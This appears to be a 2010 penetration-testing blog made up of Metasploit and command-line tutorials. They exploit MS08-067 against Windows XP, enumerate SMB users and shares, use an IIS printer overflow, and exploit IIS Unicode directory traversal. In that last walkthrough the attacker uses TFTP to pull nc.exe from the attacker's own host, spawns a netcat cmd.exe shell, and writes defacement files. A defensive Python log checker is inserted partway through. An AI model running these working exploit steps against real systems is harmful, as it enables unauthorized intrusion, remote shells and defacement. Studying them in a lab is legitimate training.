Target: 192.168.1.50 (Windows XP SP2 English)
Your machine: 192.168.1.252 (BackTrack 3 with Metasploit 3.x)
Step 1: Scan for SMB Vulnerability (netapi = MS08-067)
nmap -sS --script=smb-check-vulns 192.168.1.50
Step 2: Check the SMB Version (O/S, SP level & Language)
cd /pentest/exploits/msf3
./msfconsole
msf > use scanner/smb/smb_version
msf > set RHOSTS 192.168.1.50
msf > run
Step 3: Exploit with MS08-067 module
msf > use windows/smb/ms08_067_netapi
msf > set PAYLOAD windows/shell/bind_tcp
msf > set RHOST 192.168.1.50
msf > show targets
msf > set TARGET 3 (pick the target ID that matches the OS, SP level and language found in step 2)
msf > run
meterpreter > sysinfo
Computer: LON-CL1
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
Tuesday, March 9, 2010
Tutorial: Enumeration via SMB/CIFS
Enumerate Users
nmap -sS --script=smb-enum-users ip_address
Enumerate Shared Folders
nmap -sS --script=smb-enum-shares ip_address
Enumeration with Metasploit Auxiliary module
cd /pentest/exploits/msf3
./msfconsole
msf > use scanner/smb/smb_enumusers
msf > set RHOSTS ip_address
msf > run
Monday, March 8, 2010
Tutorial: Metasploit Framework 3.x Basics
cd /pentest/exploits/msf3
./msfconsole
msf > search iis
ISAPI Printer Overflow Exploit
msf > info windows/iis/ms01_023_printer
msf > use windows/iis/ms01_023_printer
msf > show payloads
Bind TCP payload
msf > set PAYLOAD windows/shell/bind_tcp
msf > show options
Set the target IP address
msf > set RHOST 131.107.1.101
msf > exploit
Tutorial: IIS Unicode Directory Traversal
Step 1: Testing IIS Directory Traversal Exploit
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Step 2: Upload Netcat to the target machine
Make sure that you have started the TFTPD service (Start > Services > TFTPD > Start TFTPD) and copied nc.exe from the /pentest/windows_binaries/tools directory to the /tmp directory.
cd /pentest/windows_binaries/tools
cp nc.exe /tmp
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp+-i+131.107.1.252+GET+nc.exe
Step 3: Verify if Netcat has been uploaded
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
Step 4: Launch Netcat in listening mode on the target, port 5555 (launch netcat and spawn a command shell)
nc -v 131.107.1.101 80
GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+nc+-v+-l+-p+5555+-d+-e+cmd.exe
Step 5: Connect to the open port on the remote machine
nc -v 131.107.1.101 5555
131.107.1.101: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [131.107.1.101] 5555 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
c:\inetpub\scripts>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 131.107.1.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Step 6: Test our privilege level by writing a file to multiple directories.
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > hacked.txt
echo HACKED BY MR.PEANUT! > hacked.txt
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > c:\hacked.txt
echo HACKED BY MR.PEANUT! > c:\hacked.txt
c:\inetpub\scripts>echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
echo HACKED BY MR.PEANUT! > c:\inetpub\wwwroot\hacked.txt
Access is denied.
c:\inetpub\scripts>
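As an added defender's example (not part of the original tutorial): a small Python checker that parses IIS W3C log lines and canonicalizes cs-uri-stem the way unpatched IIS did, decoding twice and mapping overlong UTF-8 separators, so the ..%255c.. requests above are flagged as traversal even though a single decode hides them. The log lines, IP addresses and the overlong-UTF-8 handling (which goes beyond the double encoding the tutorial uses) are my constructed additions.

```python
import re
from urllib.parse import unquote_to_bytes
# Constructed IIS W3C log lines (not from any real server); the 10.0.0.9 entries
# mirror the request shapes sent with netcat in the tutorial above.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2010-03-01 10:00:01 10.0.0.5 GET /default.htm - 200
2010-03-01 10:00:02 10.0.0.9 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
2010-03-01 10:00:03 10.0.0.9 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2010-03-01 10:00:04 10.0.0.7 GET /images/logo%2520big.gif - 200
2010-03-01 10:00:05 10.0.0.9 GET /scripts/..%255c../winnt/system32/cmd.exe /c+tftp+-i+10.0.0.9+GET+nc.exe 200
"""
# Overlong UTF-8 forms that unpatched IIS accepted as path separators (MS00-078).
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\"}
DOTDOT = re.compile(rb"(?:^|/)\.\.(?:/|$)")

def canonicalize(stem: str, rounds: int = 2) -> bytes:
    """Decode like unpatched IIS: `rounds` percent-decodes, overlong UTF-8 mapped, '\\' folded to '/'."""
    raw = stem.encode()
    for _ in range(rounds):
        raw = unquote_to_bytes(raw)
    for seq, sep in OVERLONG.items():
        raw = raw.replace(seq, sep)
    return raw.replace(b"\\", b"/")

def classify(stem: str, query: str) -> list:
    # Returns the reasons a request looks like a traversal attempt; [] means clean.
    reasons = []
    single, double = canonicalize(stem, 1), canonicalize(stem, 2)
    if DOTDOT.search(double):
        reasons.append("dot-dot segment after canonicalization")
        if not DOTDOT.search(single):  # only the second decode exposes it
            reasons.append("traversal hidden by double encoding")
    if double.lower().endswith(b"cmd.exe"):
        reasons.append("cmd.exe requested")
        if "tftp" in query.lower():
            reasons.append("tftp transfer in query")
    return reasons

def analyze(log_text: str) -> list:
    # Parses W3C lines and returns (client_ip, stem, reasons) for suspicious hits.
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if not fields or line.startswith("#") or len(fields) < 7:
            continue  # blank line, W3C directive, or truncated record
        c_ip, stem, query = fields[2], fields[4], fields[5]
        reasons = classify(stem, query)
        if reasons:
            hits.append((c_ip, stem, reasons))
    return hits
```

Note that the logo%2520big.gif line is double-encoded but stays clean, since only a dot-dot segment after canonicalization counts as traversal.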
Tuesday, January 19, 2010
IE Aurora
Internet Explorer "Aurora" Exploit Code released to the public.
Check here:
http://praetorianprefect.com/archives/2010/01/the-aurora-ie-exploit-in-action/
Monday, January 18, 2010
Thursday, January 14, 2010
BackTrack 4 is Here!!!
Guys,
The long awaited BackTrack 4 (Security Live CD Distro) is finally here.
You can download the ISO file or the VMware version here:
http://www.backtrack-linux.org/downloads/
I have tested it and it works great. I even tried to update it with the latest Metasploit Framework 3.3.4 and it's up and running smoothly.
Let's share some information on this distro since I'm one of the fans.
For those Security freaks in Indonesia, you can join: IndoBackTrack, here is the link:
http://indobacktrack.or.id/
There you can also find some alternative download links for BackTrack 4 Final Release.
Enjoy...